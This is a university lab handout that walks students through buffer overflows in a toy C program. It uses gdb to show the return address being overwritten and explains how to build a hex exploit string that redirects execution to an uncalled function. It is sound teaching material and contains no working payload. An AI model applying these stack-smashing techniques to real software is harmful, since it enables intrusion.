CS 270 Lab 4: Introduction to Buffer Overflows

This lab introduces you to buffer overflows. Please follow the instructions given below, adapted from an exercise produced by Bryant and O'Hallaron, the authors of our textbook.


  1. wget http://www.cs.uky.edu/~raphael/courses/CS270/laboratory4/bufdemo.tar.gz
  2. tar -vzxf bufdemo.tar.gz
  3. cd bufdemo; less bufdemo.c
  4. Read the program.
  5. make
  6. Notice the compile-time warnings.
  7. ./bufdemo
  8. Type 123 when prompted. You should see the expected output:
      Abuf = ''
      Bbuf = '123'

Basic buffer-overflow exercises

  1. Refer to this stack-layout diagram:
    picture of stack
  2. Run script mysession.txt to create mysession.txt, as usual. To type in answers to the questions, run cat > /dev/null and then type in your answer. After you have typed in your answer, type Control-D (end of file).
  3. Find an input string that results in the program printing
        Abuf = ''
        Bbuf = '1234'
  4. Type make asm to get an objdump listing in bufdemo.s. How much space does gcc allocate to each array of 4 characters?
  5. Find an input string that results in the program printing
        Abuf = 'efghijk'
        Bbuf = 'abcdefghijk'
  6. Give abcdefghijklmnopqrstuvwxyz as input. What is the output? Why?
  7. Run the program under gdb (script should still be running) and set a breakpoint just before returning from echo() (You can put the breakpoint at line 14, which is the closing '}'). Run the program and type abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrst as the input. Single-step (stepi) the program past the return from echo(). Does the echo() procedure return to main()? Explain what is happening.

    As you single-step through the instructions in gdb, you may find it useful to set up this display:

          display/5i $pc
    Then every time gdb stops at a breakpoint or after a stepi or nexti command, it shows the next 5 assembler instructions.

    As echo() is about to return to main(), you might want to look the return address, which is pointed to by $rsp, in several ways:

    	  x/x $rsp
    x/4c $rsp
    x/s $rsp

Advanced buffer-overflow exercise

In the bufdemo directory is a file called oflow_echo.c. You can compile it by make GOAL=oflow_echo.

Try to find an input string that causes the oflow_echo program to call the not_called() procedure. You can verify that oflow_echo.c never calls not_called(), so you need to use a buffer-overflow attack (described below) to fool the code into jumping to not_called().

You need to create a binary exploit string to send as input to the program. To create an exploit string, you can use the hex2raw program, which is in the bufdemo directory you have already built. hex2raw takes as input a hex-formatted string: Each byte represented by two hex digits. For example, the ASCII string 012345 is represented in hex format as 30 31 32 33 34 35, because the ASCII code for decimal digit n is 0x3n.

Separate the hex characters you pass to hex2raw by whitespace (blanks or newlines). I recommend separating different parts of your exploit string with newlines while you're working on this puzzle. hex2raw also supports C-style block comments, so you can mark off sections of your exploit string. For example:

bf 66 7b 32 78 /* some arbitrary bytes */
Be sure to leave space around both the starting and ending comment strings (/*, */) so they are properly ignored.

Place your hex-formatted exploit string in the file exploit.txt. From it, build a binary file like this:

	./hex2raw < exploit.txt > exploit.raw
Run oflow_echo from gdb in order to get consistent results (Linux applies address-space layout randomization otherwise). Inside of gdb, you can say:
(gdb) run < exploit.raw | head
to start the program. This command pipes the output through head to protect you from unbounded output, which can happen if you provide some invalid inputs in exploit.raw.


When you complete the exercises, submit your typescript file to the cs portal (https://www.cs.uky.edu/csportal).